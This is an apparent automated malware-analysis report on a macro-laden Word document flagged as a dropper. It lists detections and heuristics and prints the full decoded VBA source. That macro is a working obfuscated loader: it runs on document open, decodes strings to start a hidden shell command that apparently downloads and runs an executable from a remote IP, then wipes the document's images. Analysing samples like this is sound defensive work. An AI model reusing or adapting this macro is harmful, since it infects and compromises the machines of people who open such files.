MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks, indicative of a dropper. The ClamAV signature 'Doc.Dropper.Agent-5746617-0' further confirms its malicious nature. The VBA code's primary function appears to be executing a secondary payload, likely downloaded from an external source, which is a common tactic for malware droppers.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-5746617-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-5746617-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
serbesmvcczm = "lhqlvhjuennbxgji" qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK"))) End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
serbesmvcczm = "lhqlvhjuennbxgji" qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK"))) End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Public Sub Document_Open() Dim mfbpruruql, materialtunnel -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8562 bytes |
SHA-256: b69ed29276d36c8efa4f1d4d22852e36163b817c7b4106af6498ae338b52120a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim mfbpruruql, materialtunnel
mfbpruruql = 12
materialtunnel = 42
If mfbpruruql <> materialtunnel Then
Dim dpnebihzpzz, bkgjpgkwddybfqs, izxjsbrnsubnthrmxd
dpnebihzpzz = "owqerudjmigrbmfj"
bkgjpgkwddybfqs = 61
izxjsbrnsubnthrmxd = "almostnurse"
End If
Dim lawnnoise, travelweird, pgvgirswmsktlsv
lawnnoise = "nastyseminar"
travelweird = 82
pgvgirswmsktlsv = "dfhirkbcavxkxqpa"
Module1.cymgusaohodnmh
Dim hjpujqgjlze, engineuncover
hjpujqgjlze = 18
engineuncover = 55
If hjpujqgjlze <> engineuncover Then
hjpujqgjlze = hjpujqgjlze + engineuncover + 40
End If
Dim kpedtfrows, jllaxdepltjikpknglm
kpedtfrows = 54
jllaxdepltjikpknglm = 16
If kpedtfrows <> jllaxdepltjikpknglm Then
Dim vuumzzxamxotrkugpke, cheeseforward, rotnzwpyykqdybb
vuumzzxamxotrkugpke = "justtoe"
cheeseforward = 2
rotnzwpyykqdybb = "auetseozjejshi"
End If
End Sub
Attribute VB_Name = "Module1"
Public Sub cymgusaohodnmh()
Dim zcrzxpfybagietkf, kitrisk, stadiumtimber
zcrzxpfybagietkf = "boystrong"
kitrisk = 13
stadiumtimber = "alreadyforum"
Dim wqqpudrsjodllpgkn, uwpjneikdfymjbtqdff
wqqpudrsjodllpgkn = 87
uwpjneikdfymjbtqdff = 11
If wqqpudrsjodllpgkn <> uwpjneikdfymjbtqdff Then
End If
xqupuukmcgjcmowtks
Dim inputstyle, svslrgdkoq, hwogdmmhlbqupqs
inputstyle = "dfhvgvfkorseodxuffc"
svslrgdkoq = 86
hwogdmmhlbqupqs = "wcvizkeutbblx"
Dim holidayimpulse, cwdirwntsjljhucnkxw
holidayimpulse = 50
cwdirwntsjljhucnkxw = 35
If holidayimpulse <> cwdirwntsjljhucnkxw Then
holidayimpulse = holidayimpulse + cwdirwntsjljhucnkxw + 40
End If
End Sub
Public Function onnonkjjxqnsve()
Dim countryverify, minimumscout, raterotate
countryverify = "fewpull"
minimumscout = 31
raterotate = "cattletrend"
alphastove = ysibbadrs("Qq(GNJPefVwfQ-UgOHbGjQeVcUPtf KSGGygUsgtfeVqmU.qNfegQtPV.UWJegQbQJCPlHUiUGeUnVItVK)Uf.9qD9IoHgwfnGKlqogaKdIFUfiglfegU(G'qghItUftVpJ:Q/fJ/gV1q8I5II.q1I1K7fg.fU79U3H.PG1Vg4UV7Q/Qu", "HVIJGqgPg9UfUQK")
onnonkjjxqnsve = ysibbadrs("EApXEouwHeXurcsHDhXetXlXlX AD-XAwA AhMXiXcdAdXceXnE c-PnXoDpI X-EeEpA tIbXycXpEEatIsIDsP ", "PAHMEXutEcXXXID") & alphastove & rtpijwjidjrcri
Dim aduxuzwqgovvpfpmzck, aonbpgkwanl, dzlfsneeou
aduxuzwqgovvpfpmzck = "abandoninjury"
aonbpgkwanl = 67
dzlfsneeou = "arcticlab"
Dim boatdistance, jpffbksve
boatdistance = 27
jpffbksve = 44
If boatdistance <> jpffbksve Then
Dim barelycouch, tnjerntthctkxrleczy, generalteach
barelycouch = "allowvisual"
tnjerntthctkxrleczy = 61
generalteach = "pexldkdjmutlis"
End If
End Function
Public Function rtpijwjidjrcri()
rtpijwjidjrcri = ysibbadrs("l5pAdLlaJtALeG.Ze5x5keh'nF,k'Z5%hT3EGMLJPk%k5\GJplulZtFAtLy5xJk83A6L.GeAnxFeFA'AL)Z;k AASAntAkaLZrl5tJ-ZlPhnrFLoAc3FehZsLks5J(JG'Z%JTAE3MLPA%F\5ApJnu55tAtGyGxGJ8nh6A.AenAxA5eGA'Zn)", "J5kAFZh3A5LGLnl")
Dim narrowused, bfntwcbxyzpc, bonemotor
narrowused = "mumrxnsuk"
bfntwcbxyzpc = 74
bonemotor = "limitopera"
End Function
Public Function ysibbadrs(cubedizzy, seonnonkjjxqnsve)
cnchgpcooch = ""
For inspireplug = 1 To Len(cubedizzy)
Dim caveglide, uncoverupset, vsaeoexrvn
caveglide = "inquirysimilar"
uncoverupset = 81
vsaeoexrvn = "raccoonrack"
Dim repairunknown, pakooyschukij
repairunknown = 56
pakooyschukij = 49
If repairunknown <> pakooyschukij Then
End If
hfmqzeapfefssivs = Mid(cubedizzy, inspireplug, 1)
Dim xvxfnemmsrirwzucm, arjtzbnls
xvxfnemmsrirwzucm = 82
arjtzbnls = 58
If xvxfnemmsrirwzucm <> arjtzbnls Then
Dim sbuualgzet, jzehygqarliblfbvfzm, otjskmteuguxysid
sbuualgzet = "lmfneltkowwbhi"
jzehygqarliblfbvfzm = 20
otjskmteuguxysid = "depthsuffer"
End If
Dim whxvvmmrruxkczb As Boolean
Dim ydgtokifhk, busypizza
ydgtokifhk = 16
busypizza = 6
If ydgtokifhk <> busypizza Then
Dim zhgkdsgtdb, fudtckkpjdtdhtcjuw, fileobey
zhgkdsgtdb = "cementjump"
fudtckkpjdtdhtcjuw = 56
fileobey = "addpony"
End If
Dim xwetwvwxgwfnoqj, zsbiwdgyz, antennalogic
xwetwvwxgwfnoqj = "matchverify"
zsbiwdgyz = 71
antennalogic = "inquirynetwork"
whxvvmmrruxkczb = wolxeukmsmqag(seonnonkjjxqnsve, hfmqzeapfefssivs)
If Not whxvvmmrruxkczb Then
cnchgpcooch = cnchgpcooch & hfmqzeapfefssivs
Dim bygjdlqwteawt, kajjleuixred
bygjdlqwteawt = 87
kajjleuixred = 53
If bygjdlqwteawt <> kajjleuixred Then
End If
Dim escapehelp, buffaloclaw, penciluniform
escapehelp = "hgwmorjvl"
buffaloclaw = 53
penciluniform = "msdxyarvoirkzzauhfx"
End If
Next
ysibbadrs = cnchgpcooch
Dim hqfttigrkta, embarksolution
hqfttigrkta = 53
embarksolution = 62
If hqfttigrkta <> embarksolution Then
hqfttigrkta = hqfttigrkta + embarksolution + 58
End If
Dim hpbsexckwpuyrax, ivivqdlvyyyjzharszz, mixedpilot
hpbsexckwpuyrax = "jellylottery"
ivivqdlvyyyjzharszz = 31
mixedpilot = "cruisejust"
End Function
Public Function wolxeukmsmqag(oeupdvvoblejfkhnk, ivlugslxteaihvv)
Dim ozmlznvikxga, gesturepurse, kzlfkcojnzpnhg
ozmlznvikxga = "cmclglismkngxi"
gesturepurse = 7
kzlfkcojnzpnhg = "ujljhrjnctlsfed"
Dim asktitle, cigarpolar
asktitle = 83
cigarpolar = 19
If asktitle <> cigarpolar Then
End If
Dim flqakwkzwxa(10) As Integer
Dim lusdwieqqlmmhd, marketmystery, wjmguopkq
lusdwieqqlmmhd = "hwzfquqhz"
marketmystery = 84
wjmguopkq = "clxxifsxcqqbbx"
Dim ebnzhzcknws(5, 5) As Double
Dim txndebiklbg, ztohjlqllsz, ucyfpbjfjbcusprjo
txndebiklbg = "hgldzqxxrzuzeekarm"
ztohjlqllsz = 26
ucyfpbjfjbcusprjo = "documentnephew"
wolxeukmsmqag = InStr(oeupdvvoblejfkhnk, ivlugslxteaihvv)
qddwcfkkzcpda = 2
Dim nuawtjdmfh, mtquqfejdqzeitjaypu
nuawtjdmfh = 8
mtquqfejdqzeitjaypu = 81
If nuawtjdmfh <> mtquqfejdqzeitjaypu Then
Dim editexpire, eviltoken, nubbeuhzhukpmonex
editexpire = "vzbxpaxyciixsfc"
eviltoken = 58
nubbeuhzhukpmonex = "appearsponsor"
End If
inspireplug = 1
Dim corelayer, jpodsvzibc, sejdpupnaxaljfdqhsr
corelayer = "aroundrose"
jpodsvzibc = 74
sejdpupnaxaljfdqhsr = "qwqkaxuvnaadopmhjc"
Dim combinedizzy, xodqdayvpbnazfyd
combinedizzy = 71
xodqdayvpbnazfyd = 45
If combinedizzy <> xodqdayvpbnazfyd Then
Dim sjailvsfdyuzqx, vouupzxrbgfb, mistakeslogan
sjailvsfdyuzqx = "ceilingtopic"
vouupzxrbgfb = 14
mistakeslogan = "intactnapkin"
End If
Dim animalenergy As Double
Dim shipstadium, execute, icgkfetiyo
shipstadium = "wusmmrusdpgihnvb"
execute = 96
icgkfetiyo = "xpdsycuhlimleaavmf"
animalenergy = 0# * qddwcfkkzcpda
Dim dumbhorror, hjjipqoqt, ybreudyselk
dumbhorror = "echotrain"
hjjipqoqt = 89
ybreudyselk = "clubcreek"
End Function
Public Sub xqupuukmcgjcmowtks()
Dim menuorgan, lockturtle, nzmwcgbphcmdhuawoo
menuorgan = "cdismqwqu"
lockturtle = 29
nzmwcgbphcmdhuawoo = "poaufgjvnmnj"
Dim hpdqwcddrtzuagvekw, uxsgkozyxedbsjmdir, serbesmvcczm
hpdqwcddrtzuagvekw = "cropdevelop"
uxsgkozyxedbsjmdir = 33
serbesmvcczm = "lhqlvhjuennbxgji"
qdeerrvqebbusc (CreateObject(ysibbadrs("4WgdSQgcQ6r1is4pg7tb3.ggS7hdeoglb6l", "bsQ3d7oHu5164gK")))
End Sub
Public Sub qdeerrvqebbusc(xqupuukmcgjcmowtks)
xqupuukmcgjcmowtks.Run onnonkjjxqnsve, 0
Dim vsboeqfqbrcevvfr, ibflknfmy
vsboeqfqbrcevvfr = 11
ibflknfmy = 66
If vsboeqfqbrcevvfr <> ibflknfmy Then
End If
Dim vtccaoywyvjqlp, kidshallow, hdodfovnutmtal
vtccaoywyvjqlp = "wxzqvhfdovpznm"
kidshallow = 92
hdodfovnutmtal = "spiceuncle"
Dim oftenprosper, jnxhlffftqdukarovwe, xfdywlkykksgeou
oftenprosper = "nothingreturn"
jnxhlffftqdukarovwe = 18
xfdywlkykksgeou = "monsterrun"
With ActiveDocument.InlineShapes
Dim iifogzucmizegxghmd, cagepull, callregular
iifogzucmizegxghmd = "doubleholiday"
cagepull = 15
callregular = "lxmmddybhlo"
Dim ykxhtefmwyrmxpetpjl, chatshuffle
ykxhtefmwyrmxpetpjl = 87
chatshuffle = 3
If ykxhtefmwyrmxpetpjl <> chatshuffle Then
End If
Do While .Count > 0
.Item(1).Delete
Dim qvhwbjydgcchagj, ldgsigbqqqsmlipxe, minyecdtgw
qvhwbjydgcchagj = "ckuicidxnkrsnzte"
ldgsigbqqqsmlipxe = 80
minyecdtgw = "cfkvieslqqlf"
Loop
Dim qvjuyeevpbhdojkms, budgetwarrior, meadowspread
qvjuyeevpbhdojkms = "ykiopgbcgxliyul"
budgetwarrior = 2
meadowspread = "bzgwmkfebkmmgvgcgn"
End With
ActiveDocument.Save
Dim bvcdvogbeogkrtbyrm, yxnizmqetphcmpiaoh
bvcdvogbeogkrtbyrm = 4
yxnizmqetphcmpiaoh = 30
If bvcdvogbeogkrtbyrm <> yxnizmqetphcmpiaoh Then
Dim empowerphone, cliniconline, guntaste
empowerphone = "aklbzueyc"
cliniconline = 39
guntaste = "wuwvnygoqyucacm"
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.